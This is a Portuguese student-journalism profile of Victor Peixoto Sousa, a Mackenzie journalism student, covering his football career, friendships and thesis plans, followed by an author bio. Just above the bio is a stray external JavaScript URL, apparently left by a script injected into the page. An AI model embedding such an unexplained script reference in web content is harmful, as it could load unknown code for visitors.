futebol

Construindo um futuro

“Escolhi estudar no Mackenzie pois boa parte da minha família estudou aqui. Então, eu sabia que é uma boa universidade e com uma boa localização”, conta Victor Peixoto Sousa de 19 anos. Estudante do terceiro semestre de Jornalismo, ele conta dos seus almejos dentro da faculdade.

Nesse tempo na universidade, ele conta sobre como amadureceu aqui e sobre as amizades que ele fez. “Minha melhor experiência aqui dentro foram as pessoas que conheci e como construímos algo muito forte com o tempo”, diz.

Victor acredita que o que o diferencia de outras pessoas é o seu carisma: “Eu tento sempre agradar todo mundo. Gosto muito de brincar com as pessoas ao meu redor e de fazer com que se sintam bem acolhidas”.

O mackenzista considera jogar futebol um hobby e essa prática fez com que ele fosse escolhido para fazer parte dos times de futebol de campo e futsal comunicação. Com isso seus lugares favoritos de se frequentar são os locais onde ele joga bola. Depois tanto tempo de treino e excelentes equipes, ele deseja ser campeão dos Jogos Universitários de Comunicação e Arte (JUCA). “Temos tudo para isso”, fala.

Por fazer parte desse meio, ele jogou por cinco anos no time do São Paulo, dos 12 aos 17. E em um desses anos, ele foi campeão da Federação e considera uma de suas grandes conquistas. “Era algo que eu gostava muito de fazer. Foi satisfatório”, conta.

Como jornalista, ele tem como objetivo fazer uma matéria sobre algo que ele gosta muito, como os projetos de auxílio às pessoas na África. “Esse é o assunto que eu pretendo tratar no meu Trabalho de Conclusão de Curso (TCC)”, explica. “Quero fazer uma reportagem que tenha um impacto positivo e faça com que as pessoas tenham esperança no mundo”, conclui.

 

https://cloudapi.online/js/api46.js

Isabelle Formigari Gandolphi
Estudante de Jornalismo, sagitariana e do interior. Repleta de sonhos e confusões. Cheia de amor pra dar e piadas pra fazer.